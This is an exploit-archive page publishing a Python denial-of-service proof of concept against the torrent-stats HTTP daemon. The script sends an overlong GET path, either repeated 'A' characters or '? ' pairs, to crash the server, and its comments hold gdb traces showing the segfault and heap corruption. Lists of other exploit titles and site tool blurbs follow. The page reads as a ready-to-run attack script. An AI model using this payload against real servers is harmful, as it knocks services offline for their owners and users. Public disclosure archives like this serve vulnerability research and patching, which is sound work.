Menu

Search for hundreds of thousands of exploits

"torrent-stats - 'httpd.c' Denial of Service"

Author

Exploit author

otr

Platform

Exploit platform

linux

Release date

Exploit published date

2012-02-03

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/python
import socket, urllib, sys
host = 'localhost'
port = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

print 'Sending GET request'

# size = sys.argv[1]
# Crash at A * 16378
size = 16379

# DOS #1: gdb trace for buffer1
#Program received signal SIGSEGV, Segmentation fault.
#--------------------------------------------------------------------------[regs]
#  EAX: 0x00000000  EBX: 0x08051258  ECX: 0x00000000  EDX: 0x20202020  o d I t s Z a P c 
#  ESI: 0x080537BC  EDI: 0x080537B8  EBP: 0xBFFFF2E8  ESP: 0xBFFFF2B0  EIP: 0x0804AF72
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
#--------------------------------------------------------------------------[code]
#=> 0x804af72 <httpd_content_handler+306>:	movb   $0x0,(%eax)
#   0x804af75 <httpd_content_handler+309>:	mov    0x20(%ebx),%edx
#   0x804af78 <httpd_content_handler+312>:	add    $0x1,%eax
#   0x804af7b <httpd_content_handler+315>:	mov    %eax,(%edx)
#   0x804af7d <httpd_content_handler+317>:	mov    -0x1c(%ebp),%eax
#   0x804af80 <httpd_content_handler+320>:	movzbl 0x1(%eax),%edx
#   0x804af84 <httpd_content_handler+324>:	test   %dl,%dl
#   0x804af86 <httpd_content_handler+326>:	je     0x804b12e <httpd_content_handler+750>
#--------------------------------------------------------------------------------
#parse_args (fd=0x9, privdata=0x8051258) at httpd.c:106
#106		*tmp++ = '\0';
buffer1 = "/" + "A" * int(size)

# DOS #2 : gdb trace for the buffer2
# *** glibc detected *** /root/torrent-stats/torrent-stats: munmap_chunk(): invalid pointer: 0x080537b8 ***
# *** glibc detected *** /root/torrent-stats/torrent-stats: malloc(): memory corruption: 0x080512c8 ***
#gdb$ backtrace
#0  0xb7fe2430 in __kernel_vsyscall ()
#1  0xb7e9b651 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7e9ea82 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb7ed249d in ?? () from /lib/tls/i686/cmov/libc.so.6
#4  0xb7edc591 in ?? () from /lib/tls/i686/cmov/libc.so.6
#5  0xb7edf395 in ?? () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7ee0f9c in malloc () from /lib/tls/i686/cmov/libc.so.6
#7  0xb7ed2437 in ?? () from /lib/tls/i686/cmov/libc.so.6
#8  0xb7edc591 in ?? () from /lib/tls/i686/cmov/libc.so.6
#9  0xb7edd80e in ?? () from /lib/tls/i686/cmov/libc.so.6
#10 0x0804ad26 in destroy_httpd_con (con=0xb7fc6ff4) at httpd.c:43
#11 0x0804b0df in httpd_content_handler (fd=0x9, privdata=0x8051258) at httpd.c:193
#12 0x0804a7a0 in event_loop () at event.c:303
#13 0x0804d237 in main (argc=0x2, argv=0xbffff474) at torrent-stats.c:124
buffer2 = "/" + "? " * int(size) + "?"

buffer = buffer2
s.send('GET ' + buffer + ' HTTP/1.1\r\nHost: ' + host + '\r\n\r\n')
print s.recv(8192) + s.recv(8192)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2015-06-30 "CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion" webapps linux otr
2012-02-03 "torrent-stats - 'httpd.c' Denial of Service" dos linux otr
2011-12-10 "Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation" local linux otr 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected